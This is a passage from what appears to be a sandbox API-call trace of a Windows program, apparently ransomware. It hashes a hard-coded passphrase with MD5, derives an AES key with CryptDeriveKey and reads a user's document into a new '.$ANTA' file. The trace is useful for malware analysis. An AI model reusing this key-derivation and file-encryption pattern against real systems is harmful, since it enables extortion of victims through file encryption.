PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0079.865] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0079.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.865] PeekMessageW (in: lpMsg=0x144e294, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e294) returned 0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0079.865] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.866] PeekMessageW (in: lpMsg=0x144e294, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e294) returned 0 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.867] CryptCreateHash (in: hProv=0x41a46a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.868] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.868] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb090, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.868] CryptHashData (hHash=0x41ac440, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.868] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.868] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb138, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.868] CryptDeriveKey (in: hProv=0x41a46a0, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac600) returned 1 [0079.869] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.869] CryptDestroyHash (hHash=0x41ac440) returned 1 [0079.869] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\4lc7zsflvh25kv.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.869] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.869] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0079.869] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb")) returned 0x10 [0079.869] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\4lc7zsflvh25kv.pps.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.872] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0079.872] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x2237, lpOverlapped=0x0) returned 1 [0079.873] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0079.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2237) returned 0x499a008 [0079.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0079.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0079.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2237) returned 0x499c248 [0079.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.876] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2237) returned 0x499a008 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.877] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0079.877] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0079.877] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0079.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2237) returned 0x499a008 [0079.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2237) returned 0x499e488 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.879] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0079.879] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.885] RtlAllocateHeap 